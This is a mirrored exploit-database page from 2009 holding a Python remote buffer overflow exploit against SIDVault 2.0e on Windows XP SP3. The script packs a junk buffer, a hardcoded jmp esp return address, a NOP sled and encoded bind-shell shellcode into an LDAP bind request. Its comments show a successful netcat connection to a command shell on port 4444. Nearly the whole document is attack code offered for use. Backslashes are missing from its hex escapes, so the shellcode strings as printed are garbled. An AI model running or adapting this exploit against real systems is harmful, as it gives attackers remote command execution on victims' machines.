SIDVault 2.0e Windows Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SIDVault 2.0e Windows Remote Buffer Overflow Exploit
# Published : 2009-09-03
# Author : Blake
# Previous Title : SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta)
# Next Title : Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)

#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys, ldap

print "n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"

if len(sys.argv)!=2:
	print "[*] Usage: %s <ip>" % sys.argv[0]
	sys.exit(0)

host = sys.argv[1]

# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed 
# EXITFUNC=seh, LPORT=4444

shellcode = (
"x89xe1xd9xe1xd9x71xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4dx38x4cx39x4bx4fx4b"
"x4fx4bx4fx45x30x4cx4bx42x4cx46x44x46x44x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx43x35x43x48x45x51x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31"
"x4ax4bx51x59x4cx4bx50x34x4cx4bx45x51x4ax4ex46"
"x51x49x50x4dx49x4ex4cx4cx44x49x50x42x54x43x37"
"x49x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47"
"x4bx50x54x46x44x51x38x43x45x4bx55x4cx4bx51x4f"
"x47x54x43x31x4ax4bx45x36x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b"
"x4cx49x42x4cx47x54x45x4cx43x51x48x43x46x51x49"
"x4bx42x44x4cx4bx50x43x50x30x4cx4bx47x30x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x43x38x51"
"x4ex43x58x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x49x46x42x46x46x33x43x56x42x48x47x43x47x42x42"
"x48x42x57x44x33x46x52x51x4fx46x34x4bx4fx4ex30"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48"
"x56x51x4fx4cx49x4bx55x42x46x4dx51x4ax4dx43x38"
"x45x52x50x55x43x5ax43x32x4bx4fx48x50x43x58x48"
"x59x44x49x4bx45x4ex4dx46x37x4bx4fx48x56x46x33"
"x51x43x51x43x50x53x46x33x50x43x50x53x51x53x50"
"x53x4bx4fx4ex30x45x36x42x48x42x31x51x4cx43x56"
"x46x33x4bx39x4dx31x4ax35x45x38x4ex44x45x4ax42"
"x50x49x57x51x47x4bx4fx49x46x43x5ax44x50x50x51"
"x46x35x4bx4fx4ex30x42x48x4ex44x4ex4dx46x4ex4d"
"x39x46x37x4bx4fx49x46x50x53x51x45x4bx4fx4ex30"
"x45x38x4ax45x51x59x4cx46x51x59x46x37x4bx4fx4e"
"x36x50x50x50x54x46x34x46x35x4bx4fx48x50x4dx43"
"x43x58x4ax47x42x59x48x46x44x39x50x57x4bx4fx4e"
"x36x46x35x4bx4fx48x50x43x56x42x4ax43x54x45x36"
"x43x58x45x33x42x4dx4cx49x4ax45x42x4ax46x30x50"
"x59x47x59x48x4cx4cx49x4ax47x42x4ax50x44x4cx49"
"x4ax42x46x51x49x50x4ax53x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex51x52x46x4cx4cx53x4cx4dx42x5ax46x58"
"x4ex4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x44"
"x56x4bx4fx43x45x50x44x4bx4fx4ex36x51x4bx50x57"
"x50x52x50x51x46x31x50x51x42x4ax45x51x46x31x50"
"x51x46x35x46x31x4bx4fx48x50x45x38x4ex4dx4ex39"
"x43x35x48x4ex50x53x4bx4fx48x56x43x5ax4bx4fx4b"
"x4fx50x37x4bx4fx4ex30x4cx4bx50x57x4bx4cx4dx53"
"x49x54x42x44x4bx4fx4ex36x46x32x4bx4fx4ex30x43"
"x58x4ax50x4cx4ax45x54x51x4fx46x33x4bx4fx48x56"
"x4bx4fx4ex30x41x41")

junk = "x41" * 1024		# junk buffer
ret = "x33xbfx96x7c"	# jmp esp 7C96BF33 Shell32.dll XP SP3
nops = "x90" * 10		# nop sled
sc = shellcode			# shellcode
junk2 = "x42" * 2375		# 3071 - 696 = 2375 junk

print "[+] Sending payload"

l = ldap.open(host)
l.simple_bind("dc=" + junk + ret + nops + sc + junk2, "x42" * 256)

print "[+] Check port 4444 for shelln"

# www.Syue.com [2009-09-03]